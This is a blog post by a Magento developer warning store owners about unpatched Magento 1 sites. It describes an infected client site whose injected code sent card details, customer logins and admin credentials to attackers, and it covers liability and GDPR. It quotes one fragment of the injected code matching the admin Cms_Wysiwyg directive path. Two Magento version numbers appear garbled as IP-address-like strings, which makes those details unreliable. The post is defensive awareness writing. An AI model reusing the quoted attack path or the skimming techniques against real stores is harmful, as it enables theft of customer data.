In this industry I come across a lot of Magento "rescues". These are typically Magento websites from the 1.4-1.9 era where the client originally paid quite a lot of money to have an e-commerce website built for them, but have since left it to stagnate.
Is it the Clients Responsibility or the Agency?
Most of the time this is not the clients fault, they paid for a product and expect that product to stand the test of time. Unfortunately this is not the case for the majority of software and is especially not the case with Magento.
It is more likely the web agencies fault, having not made clear that keeping software up to date is a critical task and therefore not building the cost of such maintenance into the budget for the website or through ongoing support.
To take a typical example, in 2014 Magento 1.9 was released. This is the last major version of Magento 1 and is over 4 years old. At this point in time a typical client would have paid their web agency, lets say £10,000 to build a Magento CE website for them. The client would then have a hosting charge added to their monthly retainer, and perhaps some digital marketing on top of that.
Let's say for this example that a client has paid £10,000 for the website and is paying £250 per month for hosting and digital marketing. This is a lot of money, and quite rightly a lot of Magento clients would anticipate that this covers absolutely everything to do with their website and that it's a long-term investment.
But unfortunately all web agencies want to make profit, and so that hosting charge is typically just that - hosting. Which means that the website sits on a server and is accessible to the world. That is the role of hosting and is what you pay for, space on a server and perhaps a nice shiny SSL certificate renewed each year.
And then it's left to age...
But unlike cheese or a fine wine, Magento websites do not age well. They rot, they develop holes, the world changes around them and unfortunately if left untouched, the software remains the same.
Each and every day there are groups of hackers out there who "work" all day trying to find these holes and exploit them for gain. And Magento is a massive target. Would a hacker really pass up the change to exploit your paying customers? Capture those card details and other personal information? Of course not.
However a lot of Magento websites built in 2014 (or any time really - if they're out of date) are sitting there ready for hackers to jump in and syphon those credit card details. Or worse, they are already hacked and you just don't know it.
An example hacked Magento website
Recently I ran a malware scan on a referral client of mine. A "rescue" if you will. It was peppered with hacks, but from the front-end perspective everything was fine, looked fine and the website was fast and working well.
(To perform a Magento malware scan follow the instructions here)
However, when I looked into the hacked files that the malware scan threw up, I found what was really happening.
Here are a few examples of the files affected and what I gleaned from the injected code:
index.php (contains preg_match('//admin/Cms_Wysiwyg/directive/index//' and other code)
Yes, the root index.php was compromised, looking at the code it is clear that this allows users to gain access to your website. Not only this but actually modifying the index.php means that the server itself wasn't up to the task of defending itself.
This hack, sends all user information to a third-party. I mean ALL user data - credit card information and personal details.
Again, sending ALL user information straight to the hackers, including geo-location, IP address, Name, Billing Address, Card information, Email, DoB - everything a hacker needs to fake your identity.
This hack sent the admin user details directly to the hackers. So every time you login, the hackers will receive the username/password and URL (so they know the admin path). Changed your password? Great, next time you login the hackers know it too!
Similarly to the previous hack, this one intercepts your customers email / username and password. Every time they login. Unfortunately for most internet users, passwords are not unique to every website, this means that the email/password combination might be used elsewhere (or worse still - for their inbox itself!). So not only is your website compromised, now the customer is.
Unfortunately this hack essentially just lays your website bare to hackers, they now have access to your database, encryption key and anything else they need.
Did the client know?
No. The client just wanted a few issues fixed on their website. It was a 184.108.40.206 and contains a few core bugs (like password miss-matching when logging in for example). My task was to fix these bugs, unfortunately what I found stopped me in my tracks.
What can be done - Magento patches?
A quick search and I found that this Magento 220.127.116.11 is missing almost 20 patches. Not only this but it was missing an SSL certificate, the server itself was missing an SSL certificate and generally the server was not secure.
The first thing I did was to advise the client to cease trading, shut down the website or at least shut down the customer account and checkout areas. Drastic? I think not. What is more drastic, missing some sales or continuing to allow all your data to be harvested by hackers?
As for the cleanup, unfortunately there are 3 main things to think about when attempting to correct a hacked website, and not everything is entirely under one companies control.
1. The Server The server needs to be top-notch, secure and maintained. A reputable company who specialises in hosting should be responsible.
2. The Software The software needs to be maintained, updated, fixed and constantly monitored (in some cases it may be best to start afresh)
3. The Mindset Yes you can fix up a hacked website, but it then becomes a target, probably even more so if the hackers flag up that they can no longer contact it. Therefore security really needs to be a main focus of your ongoing e-commerce strategy.
Who is liable?
A few months ago another agency contacted me with a similar problem. Their Magento website had been hacked, the checkout contained a very innocuous Credit Card form. Something that didn't look out of place. Customers had the option of either going to paypal, or entering their card information into the provided form. Just have a think about it and wonder what percentage of people would opt for the credit card form?
The hack was harvesting credit card information. The ICO got involved and the owners of the Magento website were fined heavily after receiving numerous complaints from their customers that "after buying from this site my credit card details were stolen and used elsewhere".
Real-life customers can always trace these problems to a particular source. It's not just make-believe. These problems do exist, the fines certainly exist and the penalties are severe.
When Magento website is hosted, unless specially stated in the contact - the store owner is responsible for their data. A store owner may pay £50 per month for hosting, but if you do not host with reputable providers who take this sort of thing seriously, you are running a very large risk indeed.
Can a client pass on the responsibility for this to an Agency?
It would be a brave agency indeed to take on such a responsibility. But it is a question you could ask in the initial stages.
You will find many agencies and web hosting companies out there who push this back on the client. In fact, there are a lot of web hosting companies in particular who will not accept old, un-patched Magento websites to be hosted with them. It's not really the liability for them, but the hassle of cleaning up the mess for both the affected site and others on the same server.
What about GDPR and Magento Hacks?
It was the same with GDPR, clients thinking that GDPR was the web agencies responsibility, whereas the law states it is always the responsibility of the business owner. (Thankfully a lot of agencies leapt at the chance to recommend changes and suggestions to their clients over GDPR in order to earn a few more development hours.)
With the introduction of GDPR, it specifically states that all customer information contained and transferred through your website must be protected. So technically speaking, if you unwillingly allow your Magento website to become insecure, allow hackers to exploit card details and other information without taking the necessary steps - you are liable.
And we all know that GDPR fines are serious business...
Do the hackers actually use this information?
The sad truth is, there is probably so much user data already exploited from hacks like these, that there is just too much for the hackers to really get their teeth into. They'll be like kids in a sweet-shop, surrounded by treats but feeling sick after a few kit-kats. Nevertheless, rest assured that the data is still out there somewhere just waiting to be misused.
So why is it so important to maintain your Magento website?
Security, pure and simple. It's not about "new features" it's always about security.
If you imagine that your Magento website is actually your "bricks-and-mortar" store on the high-street, then this concept should strike it home.
When you accept visitors onto your Magento website you are inviting them into your shop. If you've let your security lapse (perhaps the intruder alarms are broken, the CCTV is dead and there's no security guard on point looking for suspicious characters) then you're left wide open.
Your customers however are browsing your isles, everything seems fine - the shop is nice, the customer service is friendly and the customers trust you and continue buying your goods.
Little do they know how ill-equipped the store is to deal with...
The credit card thief hiding in the corner, swiping details every time a transaction is made.
The identity thief hanging around outside entrance, stealing peoples names addresses and phone numbers.
And the master criminal, dressed in black, hiding in your back office watching you key in the combination to your safe.
I'm not saying that Magento websites, and all hosting and web agencies are culpable. There are plenty of fantastic Magento builds, hosting services and web agencies who take this seriously. Really there are lots and lots of people who are doing the right thing.
What breaks my heart is that there are a MASSIVE number of hacked Magento websites out there, and a MASSIVE number of bad agencies, hosting services and Magento builds. All originally set up with the same promises and expectations. And a MASSIVE number are now unfortunately victims to the problems outlined in this article.
Most with the store owner being oblivious to any problems whatsoever.